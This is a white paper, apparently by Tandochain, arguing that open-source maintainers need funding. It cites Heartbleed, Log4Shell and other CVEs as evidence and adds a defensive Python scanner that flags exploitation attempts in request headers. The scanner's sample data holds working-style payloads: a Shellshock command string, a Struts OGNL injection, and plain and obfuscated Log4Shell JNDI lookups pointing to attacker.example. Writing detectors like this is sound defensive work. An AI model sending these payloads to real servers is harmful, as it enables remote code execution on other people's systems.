The Importance of Financial Support for Open-Source Software

Tandochain
May 6, 2023


Abstract

Open-source software is growing in popularity and is now used in everything from small tools to critical software and services. However, financial support for open-source projects remains a major challenge. Many open-source contributors are not paid, which leads to incomplete or abandoned projects and to the security risk of running outdated or unmaintained software. This paper explores the importance of financial support for open-source software, highlights its benefits to society, and identifies ways to incentivize and support open-source contributors so that they can make a living from their projects.

Introduction

Open-source software has become ubiquitous in modern technology, from web browsers and mobile operating systems to cloud infrastructure. It is widely used in industries ranging from finance and healthcare to education. The growth of open-source software has been remarkable in recent years, with the number of projects increasing dramatically. According to GitHub’s 2020 State of the Octoverse, over 60 million new repositories were created that year by a community of more than 56 million developers. The report also found that out of the 238 million repositories on GitHub, at least 42 million were public. This shows that open-source software is a significant driver of technological innovation.

Lack of Financial Support for Open-Source Contributors

Although open-source software is widely used, financial support for its contributors remains a significant challenge. The 2020 FOSS Contributor Survey found that just over half of respondents were paid for at least some of their FOSS contributions by their employer or a third party, while just under half were volunteers. This raises the question of the role of money and corporate involvement in the future of FOSS, a topic of ongoing debate.

On one hand, if contributors cannot support themselves financially, they may be less likely to work on FOSS projects. Without financial support, they often have to work full-time jobs and devote their spare time to open-source work, leading to burnout, fatigue, and lack of motivation that can result in incomplete or abandoned projects.

On the other hand, there is a concern that paid contributors (especially project maintainers) may prioritize the interests of their employers rather than those of all project users. Additionally, if organizations paying employees to contribute decide it is no longer cost-effective to do so, this could be a significant issue, particularly in the event of a large negative economic shock like a recession.

A more recent survey by DigitalOcean found that only 20% of respondents had been paid for their contributions to open source, while 53% agreed or strongly agreed that individuals should be compensated for their work. This suggests that there is considerable room for improvement in financial support for open-source contributors.

Impact on Open-Source Users

The impact of the lack of funding on open-source software extends beyond the developers and contributors. It also affects the users of open-source software, who may rely on it for critical operations. Without adequate support, open-source software may not receive timely updates, bug fixes, or security patches, leaving vulnerabilities that attackers can exploit. This poses a significant threat to companies that rely on open-source software.

Here are a few instances:

  1. Heartbleed (CVE-2014-0160) — A missing bounds check in OpenSSL’s TLS heartbeat extension let a remote peer read up to 64 KB of a server’s process memory per request, exposing session data, passwords, and private keys. It affected a large share of TLS-enabled websites and services, including popular sites such as Yahoo and GitHub. At the time, OpenSSL was maintained by a handful of developers, only one of them full-time, on roughly $2,000 a year in donations; the incident prompted the Linux Foundation’s Core Infrastructure Initiative.
  2. Shellshock (CVE-2014-6271) — Bash executed commands appended to function definitions that it imported from environment variables, so any service that placed untrusted input into the environment (CGI scripts that export HTTP headers, DHCP clients, and others) could be made to run arbitrary commands. It affected a wide range of systems, including Linux, Unix, and Mac OS X.
  3. libpng integer underflow (CVE-2015-8540) — In 2015, the libpng library, used for handling PNG image files, was found to have an integer underflow in its keyword-checking routine (png_check_keyword) that a crafted PNG could trigger, leading to an out-of-bounds read. It was one of several memory-safety bugs found in libpng that year, some of which could crash applications or potentially allow code execution in the many programs that embed the library.
  4. ImageMagick RCE (CVE-2016-3714, “ImageTragick”) — In 2016, the ImageMagick image-processing library was found to pass insufficiently filtered input to the external “delegate” programs it invokes, so shell metacharacters embedded in a crafted image file could execute arbitrary commands. Web services that ran ImageMagick on user-uploaded images were directly exposed.
  5. Apache Struts RCE (CVE-2017-5638) — An OGNL expression injected through the Content-Type header of a multipart request was evaluated by the Struts Jakarta Multipart parser, allowing attackers to execute arbitrary code on vulnerable servers. The flaw affected a wide range of applications built on Apache Struts, including government websites and financial institutions. Its exploitation at Equifax, a credit bureau, compromised private records belonging to approximately 147.9 million Americans, 15.2 million British citizens, and around 19,000 Canadian citizens, one of the largest identity-theft incidents on record. Notably, the Struts fix had been published in March 2017, about two months before the Equifax intrusion began, so the damage also reflects how slowly downstream users apply upstream patches.
  6. Apache Tomcat RCE (CVE-2017-12617) — Apache Tomcat is a widely used open-source web server and servlet container. In 2017, it was found that when the default servlet’s “readonly” initialisation parameter was set to false, a remote attacker could upload a JSP file via an HTTP PUT request and then execute it by requesting it, giving arbitrary code execution on the server.
  7. Drupalgeddon 2 (CVE-2018-7600) — Insufficient input sanitisation in the Form API of the Drupal content management system allowed unauthenticated attackers to execute arbitrary code on vulnerable sites, potentially compromising sensitive information and allowing unauthorized access. It was mass-exploited to install crypto-miners on affected sites.
  8. Ghostcat (CVE-2020-1938) — A flaw in the Apache Tomcat AJP connector, enabled by default on port 8009, let an unauthenticated attacker read any file within a deployed web application, such as configuration files and source code, and, where the application also accepted file uploads, execute code. It affected numerous servers hosting Java-based applications.
  9. Log4Shell (CVE-2021-44228) — In 2021, it was disclosed that the Log4j 2 logging library resolved JNDI lookups such as ${jndi:ldap://…} inside log messages, so any attacker-controlled string that reached a log call (an HTTP User-Agent header, a chat message, a form field) could make the server fetch and load remote code. The impact was far-reaching, with many organizations and websites affected. The vulnerability was exploited in the wild to install ransomware, crypto-miners, and other malware on vulnerable servers, and to steal sensitive data such as credentials and customer records. At the time, Log4j was maintained by a small group of largely unpaid volunteers.

Although not all open-source vulnerabilities are caused by a lack of funding, these incidents underscore the importance of sustained investment in open-source projects and the potential risks of relying on projects that don’t have sufficient resources for maintenance and development.
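Several of the incidents above were exploited through attacker-controlled request data. The following example, added for this page and not code from Tandochain or from any of the projects named, shows how a defender can triage captured request headers for exploitation attempts against three of them: Shellshock, the Struts OGNL injection (CVE-2017-5638) and Log4Shell, including the nested-lookup obfuscation attackers used to hide the string jndi. The header dictionaries, header names and hostnames in it are constructed samples, and the logging format (a dict of header name to value per request) is an assumption. Matching patterns like these helps prioritise response; the only fix for the underlying flaws is upgrading the affected component.

```python
import re
from typing import Dict, List, Tuple

# Added example (not the projects' own code): triage captured request headers
# for exploitation attempts against Shellshock, Struts S2-045 and Log4Shell.
# All sample requests further down are constructed, not real traffic.

# Shellshock: Bash parsed exported function definitions that start with "() {".
SHELLSHOCK = re.compile(r"\(\)\s*\{")

# Struts 2 (CVE-2017-5638): an OGNL expression in a malformed Content-Type
# header, e.g. %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@...)...}
STRUTS_OGNL = re.compile(r"[%$]\{.*#")

# Log4Shell: a JNDI lookup anywhere in a logged value. Log4j lower-cases the
# lookup prefix before matching it, so "${JnDi:" is just as dangerous.
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Lookup forms attackers nest to hide the literal text "jndi":
#   ${lower:J} / ${upper:n}   -> case conversion of the enclosed text
#   ${::-j} / ${env:NOPE:-n}  -> undefined lookup that falls back to a default
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize_lookups(value: str, max_rounds: int = 20) -> str:
    """Collapse Log4j lookup obfuscation from the inside out.

    Each round rewrites the innermost ${lower:x}, ${upper:x} and ${...:-x}
    forms to the text they would resolve to, repeating until the string stops
    changing. The round limit keeps a hostile input from tying up the scanner.
    """
    for _ in range(max_rounds):
        new = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
            else m.group(2).upper(),
            value,
        )
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == value:
            break
        value = new
    return value


def scan_request(headers: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (finding, header name) pairs for one captured request.

    `headers` maps request header name to value, as a reverse proxy or WAF
    could log them (assumed format for this example).
    """
    findings: List[Tuple[str, str]] = []
    for name, raw in headers.items():
        if SHELLSHOCK.search(raw):
            findings.append(("shellshock CVE-2014-6271", name))
        if name.lower() == "content-type" and STRUTS_OGNL.search(raw):
            findings.append(("struts-ognl CVE-2017-5638", name))
        if JNDI.search(normalize_lookups(raw)):
            findings.append(("log4shell CVE-2021-44228", name))
    return findings


# Constructed sample requests: one benign, then one per technique, and a
# Log4Shell payload that spells "jndi" only after the lookups are resolved.
SAMPLE_REQUESTS = [
    {"User-Agent": "Mozilla/5.0", "Content-Type": "application/json"},
    {"User-Agent": "() { :; }; /bin/bash -c 'id'"},
    {"Content-Type": "%{(#_='multipart/form-data')."
                     "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#cmd='id')}"},
    {"User-Agent": "${jndi:ldap://attacker.example:1389/a}"},
    {"X-Api-Version": "${${lower:j}${upper:n}${::-d}${env:NOPE:-i}"
                      ":ldap://attacker.example/x}"},
]


def scan_all(requests: List[Dict[str, str]]) -> List[List[Tuple[str, str]]]:
    """Scan a batch of captured requests; one findings list per request."""
    return [scan_request(r) for r in requests]


if __name__ == "__main__":
    for req, found in zip(SAMPLE_REQUESTS, scan_all(SAMPLE_REQUESTS)):
        print(found or "clean", "<-", req)
```

The normalisation step is the part worth copying: simple signature matching on the string ${jndi: missed most real Log4Shell traffic within days of disclosure, because the lookup syntax lets the attacker assemble that string at evaluation time. Resolving the lookups the same way Log4j would, with a bound on the number of rounds, catches those variants without having to enumerate them.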

Recognizing the Significance of Financial Support

Recognizing the crucial role that financial support plays in maintaining and enhancing the quality of open-source software is of paramount importance. All stakeholders, including developers, contributors, and users, have a shared interest in promoting the growth and sustainability of open-source software. Together, we can ensure that open-source software development continues to thrive and contribute to society.

There are various ways to support open-source projects, such as donating, participating in crowdfunding campaigns, or contributing to the development of open-source software. However, despite the funding models that have supported many open-source projects over the years, a significant number of initiatives still face financial challenges. To overcome these obstacles, collaboration among organizations, developers, and users is crucial. By providing financial support, we can ensure that these projects remain relevant, secure, and useful for years to come.

Conclusion

Open-source software has become an indispensable part of modern technology across various industries. However, the lack of financial support for open-source contributors has led to several challenges, including project abandonment, burnout, and delayed updates and security patches. Such issues pose a significant threat to users that rely on open-source software, making it crucial to recognize the importance of supporting the growth and sustainability of open-source software.

Providing fair compensation to open-source contributors is critical to the sustainability and growth of their projects, as it attracts more talented developers and improves their longevity. To incentivize all actors in an open-source project, sustainable funding solutions should be established, enabling open-source contributors to earn a livelihood from their projects while commercial users receive reliable and high-quality code.

Financial support is essential to the growth and success of open-source software development. It is vital to work together to address the challenges faced by open-source software and ensure its continued success and benefits to society.


Tandochain

Tandochain aims to rebalance the open-source software economy in a human-centered way.